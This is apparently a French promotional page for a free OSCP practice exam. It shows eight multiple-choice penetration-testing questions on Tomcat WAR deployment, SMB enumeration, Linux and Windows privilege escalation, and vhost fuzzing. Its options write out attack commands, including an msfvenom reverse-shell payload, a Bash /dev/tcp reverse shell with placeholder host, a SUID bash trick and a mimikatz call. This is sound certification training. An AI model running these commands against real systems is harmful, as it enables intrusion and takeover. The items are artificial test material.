Questions gratuites OSCP — Offensive Security Certified Professional
Téléchargez gratuitement 60 questions d'entraînement pour la certification OSCP proposée par Offensive Security. Toutes les questions sont accompagnées de corrections détaillées avec explications techniques.
Caractéristiques de l'examen blanc
| Code de certification | OSCP |
|---|
| Éditeur | Offensive Security |
|---|
| Nombre de questions | 60 |
|---|
| Type | QCM avec 4 réponses possibles |
|---|
| Niveau | professional |
|---|
| Catégorie | Security |
|---|
| Prix | 100% gratuit |
|---|
Aperçu de 8 questions représentatives
Voici un échantillon aléatoire de 8 questions tirées de notre base d'entraînement OSCP. Pour accéder aux 60 questions complètes, lancez l'examen blanc gratuitement.
Question 1
Vous avez découvert un serveur Apache Tomcat 9.0.30 exposé sur le port 8080 d'une machine cible. L'interface de management (/manager/html) est accessible et vous avez trouvé les identifiants par défaut tomcat:s3cret dans le fichier tomcat-users.xml via une vulnérabilité LFI sur une autre application. Quelle est la méthode la plus fiable pour obtenir un reverse shell sur ce serveur Linux ?
- A. Créer un fichier JSP contenant un webshell, le compresser en .war avec jar -cvf shell.war shell.jsp, puis le déployer via le Manager et y accéder
- B. Utiliser msfvenom pour générer un payload WAR avec msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f war -o revshell.war puis le déployer via le Manager
- C. Exploiter la vulnérabilité CVE-2020-1938 (GhostCat) sur le connecteur AJP pour exécuter du code directement sans authentification
- D. Utiliser curl pour envoyer une requête PUT avec un fichier JSP malveillant directement dans le répertoire webapps de Tomcat
Question 2
Lors d'un pentest, vous avez identifié un serveur SMB (port 445) sur un réseau Windows. Vous souhaitez énumérer les partages réseau, les utilisateurs du domaine et la politique de mots de passe sans disposer d'identifiants valides. Vous tentez une connexion anonyme (null session). Quelle séquence de commandes représente l'approche la plus méthodique et complète pour cette énumération ?
- A. Lancer 'nmap --script smb-enum-shares,smb-enum-users -p 445 <cible>' uniquement, car les scripts NSE couvrent l'ensemble des informations nécessaires
- B. Utiliser 'smbclient -L //<cible> -N' pour lister les partages, puis 'rpcclient -U '' -N <cible>' pour énumérer les utilisateurs via 'enumdomusers' et la politique de mot de passe via 'getdompwinfo', complété par 'enum4linux -a <cible>' pour une énumération exhaustive
- C. Exécuter 'crackmapexec smb <cible> --shares' pour lister les partages, puis utiliser Hydra pour tenter un brute-force sur les comptes découverts
- D. Se connecter avec 'net use \\<cible>\IPC$ /user:administrator ""' pour établir une session IPC$ puis exécuter 'net view' pour lister les ressources partagées
Question 3
Vous êtes en phase de reconnaissance sur une application web d'entreprise. En analysant les en-têtes HTTP de réponse, vous observez les informations suivantes :
Server: Apache/2.4.49
X-Powered-By: PHP/7.4.3
X-AspNet-Version: absente
Set-Cookie: PHPSESSID=abc123; path=/
En parallèle, un scan avec 'nikto' révèle que le fichier /.htaccess est accessible en lecture. Quelle est la vulnérabilité la plus critique à investiguer en priorité et pourquoi ?
- A. La divulgation de la version PHP (7.4.3) dans le header X-Powered-By, car cette version contient des CVE connues permettant un Remote Code Execution
- B. La version Apache 2.4.49 qui est vulnérable au path traversal (CVE-2021-41773) permettant potentiellement la lecture de fichiers arbitraires et l'exécution de commandes si mod_cgi est activé
- C. Le cookie PHPSESSID transmis sans les flags Secure et HttpOnly, exposant la session au vol via XSS ou interception réseau
- D. Le fichier .htaccess accessible en lecture, qui pourrait révéler des règles de réécriture et des configurations de restriction d'accès
Question 4
Vous menez un pentest sur une infrastructure d'entreprise et vous avez obtenu un accès initial à un serveur Linux via une vulnérabilité web. Lors de votre énumération locale, vous découvrez que le fichier /etc/crontab contient l'entrée suivante :
*/5 * * * * root /opt/scripts/backup.sh
Vous constatez que le script backup.sh est writable par tous les utilisateurs (permissions -rwxrwxrwx) et s'exécute en tant que root. Quel est le vecteur de privilege escalation le plus fiable et le plus discret dans ce scénario ?
- A. Remplacer entièrement le contenu de backup.sh par un reverse shell Bash ('bash -i >& /dev/tcp/<IP>/<PORT> 0>&1') et attendre 5 minutes maximum
- B. Ajouter une ligne à la fin de backup.sh qui copie /bin/bash vers /tmp/rootbash et y applique le SUID bit ('cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash'), puis exécuter '/tmp/rootbash -p' après l'exécution du cron
- C. Modifier le PATH dans /etc/crontab pour pointer vers un répertoire que vous contrôlez, puis y créer un script malveillant portant le même nom
- D. Utiliser 'crontab -e' pour ajouter votre propre tâche planifiée s'exécutant en tant que root avec votre payload
Question 5
Pendant un engagement de test d'intrusion interne, vous accédez à un serveur Debian 11 via un compte utilisateur standard. L'énumération avec LinPEAS révèle que le binaire '/usr/bin/python3.9' possède la capability 'cap_setuid+ep'. Quelle commande Python exploiterait cette capability pour obtenir un shell root ?
- A. python3.9 -c 'import subprocess; subprocess.call([\'sh\', \'-p\'])'
- B. python3.9 -c 'import os; os.setuid(0); os.system(\'/bin/bash\')'
- C. python3.9 -c 'import os; os.seteuid(0); os.execvp(\'/bin/sh\', [\'sh\'])'
- D. python3.9 -c 'import pty; pty.spawn(\'/bin/bash\')'
Question 6
Vous réalisez un pentest sur une application web et vous devez cartographier l'intégralité de la surface d'attaque. L'application utilise des virtual hosts et vous suspectez que d'autres applications internes sont hébergées sur le même serveur. Quelle combinaison d'outils et techniques vous permettra le MIEUX de découvrir ces virtual hosts cachés ?
- A. Scanner tous les ports TCP avec 'nmap -p-' puis identifier les services avec -sV sur chaque port ouvert
- B. Utiliser 'ffuf' ou 'gobuster vhost' pour fuzzer le header Host avec une wordlist de sous-domaines ciblée, combiné avec l'analyse des différences de taille de réponse
- C. Effectuer un 'whois' sur l'adresse IP du serveur pour identifier tous les domaines enregistrés à cette adresse
- D. Utiliser 'nikto' avec l'option -Tuning pour scanner les vulnérabilités connues sur le serveur web
Question 7
Sur un serveur Debian compromis, vous exécutez 'cat /etc/passwd' et remarquez un compte avec l'UID 0 autre que root : 'backdoor:x:0:0::/root:/bin/bash'. Vous n'avez pas le mot de passe de ce compte. En parallèle, vous découvrez que le fichier /etc/shadow est lisible par votre groupe (permissions -rw-r----- root:shadow et votre utilisateur appartient au groupe 'shadow'). Quelle est l'approche la plus efficace pour exploiter cette situation ?
- A. Utiliser John the Ripper ou Hashcat pour cracker le hash du compte 'backdoor' extrait de /etc/shadow, puis vous connecter avec 'su backdoor'
- B. Modifier directement /etc/passwd pour supprimer le 'x' du champ mot de passe du compte backdoor, permettant une connexion sans mot de passe
- C. Exploiter une vulnérabilité kernel car un compte UID 0 supplémentaire indique que le système est déjà compromis et probablement non patché
- D. Utiliser 'passwd backdoor' pour changer le mot de passe du compte backdoor puisque vous avez accès en lecture à /etc/shadow
Question 8
Vous effectuez un pentest sur un réseau d'entreprise et obtenez un shell sur un serveur Windows en tant qu'utilisateur local à faibles privilèges. En exécutant 'cmdkey /list', vous découvrez une entrée 'Target: Domain:interactive=CORP\admin_backup / Type: Domain Password'. Quelle commande vous permettrait d'exploiter ces credentials stockés pour exécuter un processus avec les privilèges de ce compte ?
- A. net use \\DC01\C$ /user:CORP\admin_backup pour monter un partage réseau avec les credentials
- B. runas /savecred /user:CORP\admin_backup cmd.exe pour lancer un shell avec les credentials sauvegardés
- C. mimikatz.exe 'vault::cred' pour extraire le mot de passe en clair des credentials stockés
- D. psexec.exe -u CORP\admin_backup -accepteula cmd.exe pour lancer un shell distant avec ce compte
Accédez aux 60 questions complètes gratuitement
Aucune carte bancaire requise. Examen chronométré, corrections détaillées, score final.
Lancer l'examen blanc OSCP →
Pourquoi s'entraîner avec Certifexpress ?
- Questions au format officiel Offensive Security
- Corrections détaillées avec explications techniques (200+ mots par question)
- Examen chronométré comme le jour J
- Option "Refaire les questions ratées" pour cibler vos lacunes
- Suivi de votre progression dans votre tableau de bord personnel
- Accès illimité, aucun abonnement requis